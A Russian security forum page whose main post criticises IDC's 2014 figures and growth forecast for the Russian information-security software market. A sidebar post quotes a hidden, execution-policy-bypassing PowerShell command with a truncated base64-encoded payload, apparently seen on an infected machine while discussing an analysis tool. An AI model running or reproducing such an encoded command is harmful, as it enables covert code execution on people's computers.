Перейти к содержанию
Сергей Ильин

IDC засветила цифры по российскому рынку Security Software

Recommended Posts

Сергей Ильин

На прошедшей неделю назад конференции BIS Summit 2014 был пресс-брифинг на котором я анонсировал результаты своего нового анализа DLP-рынка России http://www.anti-malware.ru/russian_dlp_market_2012_2014 Помимо меня выступал еще представить IDC Фаяз Хаки, серьезный человек (директор по исследованиям в области информационной безопасности в Европе). Он не привел никаких данных по DLP-рынку, их просто нет у IDC, но вместо этого презентовал данные по общему рынку Security в России. Вот они:

WP_20140919_15_57_02_Pro.jpg

В общем с данными IDC вышел конфуз. Картинка довольно смешная. Стоит начать с того, что там или перепутан весь Security Market и Security Software Market. Иначе нельзя объяснить такие небольшие доли сетевой и веб безопасности. Защита конечных точек худо-худо бьется с тем, что в наших отчетах. Похоже. Но по остальным долям пирога большие вопросы.

Но самое интересное - это прогноз роста. IDC грубо говоря не верит в рост ИБ в России. Иначе как назвать CAGR в 4.2%? ИМХО рынок растет и будет расти намного быстрее. Такое ощущение, что Россию загнали в модель для зрелых рынков Европы и получилось то, что получилось. Но у нас типа тут Emerging Market со всеми вытекающими :)

В общем Фаяз Хаки несколько сел в лужу с такими данными. Вероятно его просто подставили коллеги из русского офиса, так как он недолго работает в IDC и явно не в курсе дел российского рынка.

post-4-1412104651_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×